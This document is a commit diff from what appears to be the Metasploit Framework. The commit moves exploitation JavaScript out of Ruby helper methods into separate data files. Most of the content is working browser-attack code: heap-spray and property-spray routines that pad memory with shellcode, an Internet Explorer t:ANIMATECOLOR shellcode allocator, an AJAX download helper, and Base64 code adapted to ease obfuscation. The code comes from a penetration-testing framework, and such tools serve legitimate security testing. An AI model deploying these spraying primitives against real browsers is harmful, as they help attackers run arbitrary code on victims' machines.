Move all exploitation-related JavaScript to their new home
parent
bcb584ea50
commit
c926fa710b
|
@ -0,0 +1,126 @@
|
|||
// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
|
||||
// variable names changed to make obfuscation easier
|
||||
var Base64 = {
|
||||
// private property
|
||||
_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
|
||||
|
||||
// private method
|
||||
_utf8_encode : function ( input ){
|
||||
input = input.replace(/\\r\\n/g,"\\n");
|
||||
var utftext = "";
|
||||
var input_idx;
|
||||
|
||||
for (input_idx = 0; input_idx < input.length; input_idx++) {
|
||||
var chr = input.charCodeAt(input_idx);
|
||||
if (chr < 128) {
|
||||
utftext += String.fromCharCode(chr);
|
||||
}
|
||||
else if((chr > 127) && (chr < 2048)) {
|
||||
utftext += String.fromCharCode((chr >> 6) | 192);
|
||||
utftext += String.fromCharCode((chr & 63) | 128);
|
||||
} else {
|
||||
utftext += String.fromCharCode((chr >> 12) | 224);
|
||||
utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
|
||||
utftext += String.fromCharCode((chr & 63) | 128);
|
||||
}
|
||||
}
|
||||
|
||||
return utftext;
|
||||
},
|
||||
|
||||
// public method for encoding
|
||||
encode : function( input ) {
|
||||
var output = "";
|
||||
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
|
||||
var input_idx = 0;
|
||||
|
||||
input = Base64._utf8_encode(input);
|
||||
|
||||
while (input_idx < input.length) {
|
||||
chr1 = input.charCodeAt( input_idx++ );
|
||||
chr2 = input.charCodeAt( input_idx++ );
|
||||
chr3 = input.charCodeAt( input_idx++ );
|
||||
|
||||
enc1 = chr1 >> 2;
|
||||
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
|
||||
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
|
||||
enc4 = chr3 & 63;
|
||||
|
||||
if (isNaN(chr2)) {
|
||||
enc3 = enc4 = 64;
|
||||
} else if (isNaN(chr3)) {
|
||||
enc4 = 64;
|
||||
}
|
||||
output = output +
|
||||
this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
|
||||
this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
|
||||
}
|
||||
return output;
|
||||
},
|
||||
// public method for decoding
|
||||
decode : function (input) {
|
||||
var output = "";
|
||||
var chr1, chr2, chr3;
|
||||
var enc1, enc2, enc3, enc4;
|
||||
var i = 0;
|
||||
|
||||
input = input.replace(/[^A-Za-z0-9\\+\\/\\=]/g, "");
|
||||
|
||||
while (i < input.length) {
|
||||
|
||||
enc1 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc2 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc3 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc4 = this._keyStr.indexOf(input.charAt(i++));
|
||||
|
||||
chr1 = (enc1 << 2) | (enc2 >> 4);
|
||||
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
|
||||
chr3 = ((enc3 & 3) << 6) | enc4;
|
||||
|
||||
output = output + String.fromCharCode(chr1);
|
||||
|
||||
if (enc3 != 64) {
|
||||
output = output + String.fromCharCode(chr2);
|
||||
}
|
||||
if (enc4 != 64) {
|
||||
output = output + String.fromCharCode(chr3);
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
output = Base64._utf8_decode(output);
|
||||
|
||||
return output;
|
||||
|
||||
},
|
||||
_utf8_decode : function (utftext) {
|
||||
var string = "";
|
||||
var input_idx = 0;
|
||||
var chr1 = 0;
|
||||
var chr2 = 0;
|
||||
var chr3 = 0;
|
||||
|
||||
while ( input_idx < utftext.length ) {
|
||||
|
||||
chr1 = utftext.charCodeAt(input_idx);
|
||||
|
||||
if (chr1 < 128) {
|
||||
string += String.fromCharCode(chr1);
|
||||
input_idx++;
|
||||
}
|
||||
else if((chr1 > 191) && (chr1 < 224)) {
|
||||
chr2 = utftext.charCodeAt(input_idx+1);
|
||||
string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
|
||||
input_idx += 2;
|
||||
} else {
|
||||
chr2 = utftext.charCodeAt(input_idx+1);
|
||||
chr3 = utftext.charCodeAt(input_idx+2);
|
||||
string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
|
||||
input_idx += 3;
|
||||
}
|
||||
}
|
||||
|
||||
return string;
|
||||
}
|
||||
|
||||
};
|
|
@ -0,0 +1,17 @@
|
|||
var memory = new Array();
|
||||
function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
|
||||
var index;
|
||||
var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
|
||||
var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
|
||||
while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
|
||||
while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
|
||||
|
||||
var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
|
||||
while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
|
||||
retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
|
||||
|
||||
var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
|
||||
for (index = 0; index < heapBlockCnt; index++) {
|
||||
memory[index] = retSlide + shellcode;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,31 @@
|
|||
function mstime_malloc(oArg) {
|
||||
shellcode = oArg.shellcode;
|
||||
offset = oArg.offset;
|
||||
heapBlockSize = oArg.heapBlockSize;
|
||||
objId = oArg.objId;
|
||||
|
||||
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
|
||||
if (offset == undefined) { offset = 0; }
|
||||
if (heapBlockSize == undefined) { throw "Size must be defined"; }
|
||||
|
||||
buf = "";
|
||||
for (i=0; i < heapBlockSize/4; i++) {
|
||||
if (i == offset) {
|
||||
if (i == 0) { buf += shellcode; }
|
||||
else { buf += ";" + shellcode; }
|
||||
}
|
||||
else {
|
||||
buf += ";#W00TA";
|
||||
}
|
||||
}
|
||||
|
||||
e = document.getElementById(objId);
|
||||
if (e == null) {
|
||||
eleId = "W00TB"
|
||||
acTag = "<t:ANIMATECOLOR id='"+ eleId + "'/>"
|
||||
document.body.innerHTML = document.body.innerHTML + acTag;
|
||||
e = document.getElementById(eleId);
|
||||
}
|
||||
try { e.values = buf; }
|
||||
catch (e) {}
|
||||
}
|
|
@ -0,0 +1,39 @@
|
|||
var sym_div_container;
|
||||
function sprayHeap( oArg ) {
|
||||
|
||||
shellcode = oArg.shellcode;
|
||||
offset = oArg.offset;
|
||||
heapBlockSize = oArg.heapBlockSize;
|
||||
maxAllocs = oArg.maxAllocs;
|
||||
objId = oArg.objId;
|
||||
|
||||
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
|
||||
if (offset == undefined) { offset = 0x00; }
|
||||
if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
|
||||
if (maxAllocs == undefined) { maxAllocs = 0x350; }
|
||||
|
||||
if (offset > 0x800) { throw "Bad alignment"; }
|
||||
|
||||
sym_div_container = document.getElementById(objId);
|
||||
|
||||
if (sym_div_container == null) {
|
||||
sym_div_container = document.createElement("div");
|
||||
}
|
||||
|
||||
sym_div_container.style.cssText = "display:none";
|
||||
var data;
|
||||
junk = unescape("%u2020%u2020");
|
||||
while (junk.length < offset+0x1000) junk += junk;
|
||||
|
||||
data = junk.substring(0,offset) + shellcode;
|
||||
data += junk.substring(0,0x800-offset-shellcode.length);
|
||||
|
||||
while (data.length < heapBlockSize) data += data;
|
||||
|
||||
for (var i = 0; i < maxAllocs; i++)
|
||||
{
|
||||
var obj = document.createElement("button");
|
||||
obj.title = data.substring(0, (heapBlockSize-2)/2);
|
||||
sym_div_container.appendChild(obj);
|
||||
}
|
||||
}
|
|
@ -0,0 +1,27 @@
|
|||
function ajax_download(oArg) {
|
||||
method = oArg.method;
|
||||
path = oArg.path;
|
||||
data = oArg.data;
|
||||
|
||||
if (method == undefined) { method = "GET"; }
|
||||
if (method == path) { throw "Missing parameter 'path'"; }
|
||||
if (data == undefined) { data = null; }
|
||||
|
||||
if (window.XMLHttpRequest) {
|
||||
xmlHttp = new XMLHttpRequest();
|
||||
}
|
||||
else {
|
||||
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
|
||||
}
|
||||
|
||||
if (xmlHttp.overrideMimeType) {
|
||||
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
|
||||
}
|
||||
|
||||
xmlHttp.open(method, path, false);
|
||||
xmlHttp.send(data);
|
||||
if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
|
||||
return xmlHttp.responseText;
|
||||
}
|
||||
return null;
|
||||
}
|
|
@ -3,8 +3,11 @@ require 'rex/service_manager'
|
|||
require 'rex/exploitation/obfuscatejs'
|
||||
require 'rex/exploitation/encryptjs'
|
||||
require 'rex/exploitation/heaplib'
|
||||
require 'rex/exploitation/javascriptnetwork'
|
||||
require 'rex/exploitation/javascriptcrypto'
|
||||
require 'rex/exploitation/javascriptosdetect'
|
||||
require 'rex/exploitation/javascriptaddonsdetect'
|
||||
require 'rex/exploitation/javascriptexploitation'
|
||||
|
||||
module Msf
|
||||
|
||||
|
@ -710,136 +713,7 @@ protected
|
|||
end
|
||||
|
||||
def js_base64
|
||||
js = <<-ENDJS
|
||||
// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
|
||||
// variable names changed to make obfuscation easier
|
||||
var Base64 = {
|
||||
// private property
|
||||
_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
|
||||
|
||||
// private method
|
||||
_utf8_encode : function ( input ){
|
||||
input = input.replace(/\\r\\n/g,"\\n");
|
||||
var utftext = "";
|
||||
var input_idx;
|
||||
|
||||
for (input_idx = 0; input_idx < input.length; input_idx++) {
|
||||
var chr = input.charCodeAt(input_idx);
|
||||
if (chr < 128) {
|
||||
utftext += String.fromCharCode(chr);
|
||||
}
|
||||
else if((chr > 127) && (chr < 2048)) {
|
||||
utftext += String.fromCharCode((chr >> 6) | 192);
|
||||
utftext += String.fromCharCode((chr & 63) | 128);
|
||||
} else {
|
||||
utftext += String.fromCharCode((chr >> 12) | 224);
|
||||
utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
|
||||
utftext += String.fromCharCode((chr & 63) | 128);
|
||||
}
|
||||
}
|
||||
|
||||
return utftext;
|
||||
},
|
||||
|
||||
// public method for encoding
|
||||
encode : function( input ) {
|
||||
var output = "";
|
||||
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
|
||||
var input_idx = 0;
|
||||
|
||||
input = Base64._utf8_encode(input);
|
||||
|
||||
while (input_idx < input.length) {
|
||||
chr1 = input.charCodeAt( input_idx++ );
|
||||
chr2 = input.charCodeAt( input_idx++ );
|
||||
chr3 = input.charCodeAt( input_idx++ );
|
||||
|
||||
enc1 = chr1 >> 2;
|
||||
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
|
||||
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
|
||||
enc4 = chr3 & 63;
|
||||
|
||||
if (isNaN(chr2)) {
|
||||
enc3 = enc4 = 64;
|
||||
} else if (isNaN(chr3)) {
|
||||
enc4 = 64;
|
||||
}
|
||||
output = output +
|
||||
this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
|
||||
this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
|
||||
}
|
||||
return output;
|
||||
},
|
||||
// public method for decoding
|
||||
decode : function (input) {
|
||||
var output = "";
|
||||
var chr1, chr2, chr3;
|
||||
var enc1, enc2, enc3, enc4;
|
||||
var i = 0;
|
||||
|
||||
input = input.replace(/[^A-Za-z0-9\\+\\/\\=]/g, "");
|
||||
|
||||
while (i < input.length) {
|
||||
|
||||
enc1 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc2 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc3 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc4 = this._keyStr.indexOf(input.charAt(i++));
|
||||
|
||||
chr1 = (enc1 << 2) | (enc2 >> 4);
|
||||
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
|
||||
chr3 = ((enc3 & 3) << 6) | enc4;
|
||||
|
||||
output = output + String.fromCharCode(chr1);
|
||||
|
||||
if (enc3 != 64) {
|
||||
output = output + String.fromCharCode(chr2);
|
||||
}
|
||||
if (enc4 != 64) {
|
||||
output = output + String.fromCharCode(chr3);
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
output = Base64._utf8_decode(output);
|
||||
|
||||
return output;
|
||||
|
||||
},
|
||||
_utf8_decode : function (utftext) {
|
||||
var string = "";
|
||||
var input_idx = 0;
|
||||
var chr1 = 0;
|
||||
var chr2 = 0;
|
||||
var chr3 = 0;
|
||||
|
||||
while ( input_idx < utftext.length ) {
|
||||
|
||||
chr1 = utftext.charCodeAt(input_idx);
|
||||
|
||||
if (chr1 < 128) {
|
||||
string += String.fromCharCode(chr1);
|
||||
input_idx++;
|
||||
}
|
||||
else if((chr1 > 191) && (chr1 < 224)) {
|
||||
chr2 = utftext.charCodeAt(input_idx+1);
|
||||
string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
|
||||
input_idx += 2;
|
||||
} else {
|
||||
chr2 = utftext.charCodeAt(input_idx+1);
|
||||
chr3 = utftext.charCodeAt(input_idx+2);
|
||||
string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
|
||||
input_idx += 3;
|
||||
}
|
||||
}
|
||||
|
||||
return string;
|
||||
}
|
||||
|
||||
|
||||
};
|
||||
|
||||
ENDJS
|
||||
js = Rex::Exploitation::JavascriptCrypto.base64
|
||||
opts = {
|
||||
'Symbols' => {
|
||||
'Variables' => %w{ Base64 encoding result _keyStr encoded_data utftext input_idx
|
||||
|
@ -872,34 +746,7 @@ protected
|
|||
# </script>
|
||||
#
|
||||
def js_ajax_download
|
||||
%Q|function ajax_download(oArg) {
|
||||
method = oArg.method;
|
||||
path = oArg.path;
|
||||
data = oArg.data;
|
||||
|
||||
if (method == undefined) { method = "GET"; }
|
||||
if (method == path) { throw "Missing parameter 'path'"; }
|
||||
if (data == undefined) { data = null; }
|
||||
|
||||
if (window.XMLHttpRequest) {
|
||||
xmlHttp = new XMLHttpRequest();
|
||||
}
|
||||
else {
|
||||
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
|
||||
}
|
||||
|
||||
if (xmlHttp.overrideMimeType) {
|
||||
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
|
||||
}
|
||||
|
||||
xmlHttp.open(method, path, false);
|
||||
xmlHttp.send(data);
|
||||
if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
|
||||
return xmlHttp.responseText;
|
||||
}
|
||||
return null;
|
||||
}
|
||||
|
|
||||
Rex::Exploitation::JavascriptNetwork.ajax_download
|
||||
end
|
||||
|
||||
|
||||
|
@ -935,39 +782,7 @@ protected
|
|||
# </script>
|
||||
#
|
||||
def js_mstime_malloc
|
||||
%Q|
|
||||
function mstime_malloc(oArg) {
|
||||
shellcode = oArg.shellcode;
|
||||
offset = oArg.offset;
|
||||
heapBlockSize = oArg.heapBlockSize;
|
||||
objId = oArg.objId;
|
||||
|
||||
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
|
||||
if (offset == undefined) { offset = 0; }
|
||||
if (heapBlockSize == undefined) { throw "Size must be defined"; }
|
||||
|
||||
buf = "";
|
||||
for (i=0; i < heapBlockSize/4; i++) {
|
||||
if (i == offset) {
|
||||
if (i == 0) { buf += shellcode; }
|
||||
else { buf += ";" + shellcode; }
|
||||
}
|
||||
else {
|
||||
buf += ";##{Rex::Text.rand_text_hex(6)}";
|
||||
}
|
||||
}
|
||||
|
||||
e = document.getElementById(objId);
|
||||
if (e == null) {
|
||||
eleId = "#{Rex::Text.rand_text_alpha(5)}"
|
||||
acTag = "<t:ANIMATECOLOR id='"+ eleId + "'/>"
|
||||
document.body.innerHTML = document.body.innerHTML + acTag;
|
||||
e = document.getElementById(eleId);
|
||||
}
|
||||
try { e.values = buf; }
|
||||
catch (e) {}
|
||||
}
|
||||
|
|
||||
Rex::Exploitation::JavascriptExploitation.mstime_malloc
|
||||
end
|
||||
|
||||
#
|
||||
|
@ -993,69 +808,12 @@ protected
|
|||
# </script>
|
||||
#
|
||||
def js_property_spray
|
||||
sym_div_container = Rex::Text.rand_text_alpha(rand(10) + 5)
|
||||
js = %Q|
|
||||
var #{sym_div_container};
|
||||
function sprayHeap( oArg ) {
|
||||
|
||||
shellcode = oArg.shellcode;
|
||||
offset = oArg.offset;
|
||||
heapBlockSize = oArg.heapBlockSize;
|
||||
maxAllocs = oArg.maxAllocs;
|
||||
objId = oArg.objId;
|
||||
|
||||
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
|
||||
if (offset == undefined) { offset = 0x00; }
|
||||
if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
|
||||
if (maxAllocs == undefined) { maxAllocs = 0x350; }
|
||||
|
||||
if (offset > 0x800) { throw "Bad alignment"; }
|
||||
|
||||
#{sym_div_container} = document.getElementById(objId);
|
||||
|
||||
if (#{sym_div_container} == null) {
|
||||
#{sym_div_container} = document.createElement("div");
|
||||
}
|
||||
|
||||
#{sym_div_container}.style.cssText = "display:none";
|
||||
var data;
|
||||
junk = unescape("%u2020%u2020");
|
||||
while (junk.length < offset+0x1000) junk += junk;
|
||||
|
||||
data = junk.substring(0,offset) + shellcode;
|
||||
data += junk.substring(0,0x800-offset-shellcode.length);
|
||||
|
||||
while (data.length < heapBlockSize) data += data;
|
||||
|
||||
for (var i = 0; i < maxAllocs; i++)
|
||||
{
|
||||
var obj = document.createElement("button");
|
||||
obj.title = data.substring(0, (heapBlockSize-2)/2);
|
||||
#{sym_div_container}.appendChild(obj);
|
||||
}
|
||||
}
|
||||
|
|
||||
Rex::Exploitation::JavascriptExploitation.property_spray
|
||||
end
|
||||
|
||||
def js_heap_spray
|
||||
js = %Q|var memory = new Array();
|
||||
function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
|
||||
var index;
|
||||
var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
|
||||
var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
|
||||
while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
|
||||
while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
|
||||
js = Rex::Exploitation::JavascriptExploitation.heap_spray
|
||||
|
||||
var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
|
||||
while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
|
||||
retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
|
||||
|
||||
var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
|
||||
for (index = 0; index < heapBlockCnt; index++) {
|
||||
memory[index] = retSlide + shellcode;
|
||||
}
|
||||
}
|
||||
|
|
||||
opts = {
|
||||
'Symbols' => {
|
||||
'Variables' => %w{ shellcode retSlide payLoadSize memory index
|
||||
|
|
|
@ -16,7 +16,7 @@ class JavascriptAddonsDetect < JSObfu
|
|||
|
||||
def initialize(custom_js = '', opts = {})
|
||||
@js = custom_js
|
||||
@js += ::File.read(::File.join(::File.dirname(__FILE__), "javascriptaddonsdetect.js"))
|
||||
@js += ::File.read(::File.join(::File.dirname(__FILE__), "../", "../", "../", "data", "js", "detect", "addons.js"))
|
||||
|
||||
super @js
|
||||
|
||||
|
|
|
@ -0,0 +1,22 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex/text'
|
||||
require 'rex/exploitation/jsobfu'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
#
|
||||
# Provides cryptographic functions in JavaScript
|
||||
#
|
||||
class JavascriptCrypto < JSObfu
|
||||
|
||||
def self.base64
|
||||
::File.read(::File.join(::File.dirname(__FILE__), "../", "../", "../", "data", "js", "crypto", "base64.js"))
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,37 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex/text'
|
||||
require 'rex/exploitation/jsobfu'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
#
|
||||
# Provides exploitation functions in JavaScript
|
||||
#
|
||||
class JavascriptExploitation < JSObfu
|
||||
|
||||
def self.mstime_malloc
|
||||
js = ::File.read(::File.join(::File.dirname(__FILE__), "../", "../", "../", "data", "js", "exploitation", "mstime_malloc.js"))
|
||||
js = js.gsub(/W00TA/, Rex::Text.rand_text_hex(6))
|
||||
js = js.gsub(/W00TB/, Rex::Text.rand_text_hex(5))
|
||||
|
||||
js
|
||||
end
|
||||
|
||||
def self.property_spray
|
||||
js = ::File.read(::File.join(::File.dirname(__FILE__), "../", "../", "../", "data", "js", "exploitation", "property_spray.js"))
|
||||
js = js.gsub(/sym_div_container/, Rex::Text.rand_text_alpha(rand(10) + 5))
|
||||
|
||||
js
|
||||
end
|
||||
|
||||
def self.heap_spray
|
||||
::File.read(::File.join(::File.dirname(__FILE__), "../", "../", "../", "data", "js", "exploitation", "heap_spray.js"))
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,22 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex/text'
|
||||
require 'rex/exploitation/jsobfu'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
#
|
||||
# Provides networking functions in JavaScript
|
||||
#
|
||||
class JavascriptNetwork < JSObfu
|
||||
|
||||
def self.ajax_download
|
||||
::File.read(::File.join(::File.dirname(__FILE__), "../", "../", "../", "data", "js", "network", "ajax_download.js"))
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
end
|
|
@ -30,7 +30,7 @@ class JavascriptOSDetect < JSObfu
|
|||
|
||||
def initialize(custom_js = '', opts = {})
|
||||
@js = custom_js
|
||||
@js += ::File.read(::File.join(::File.dirname(__FILE__), "javascriptosdetect.js"))
|
||||
@js += ::File.read(::File.join(::File.dirname(__FILE__), "../", "../", "../", "data", "js", "detect", "os.js"))
|
||||
|
||||
super @js
|
||||
|
||||
|
|
Loading…
Reference in New Issue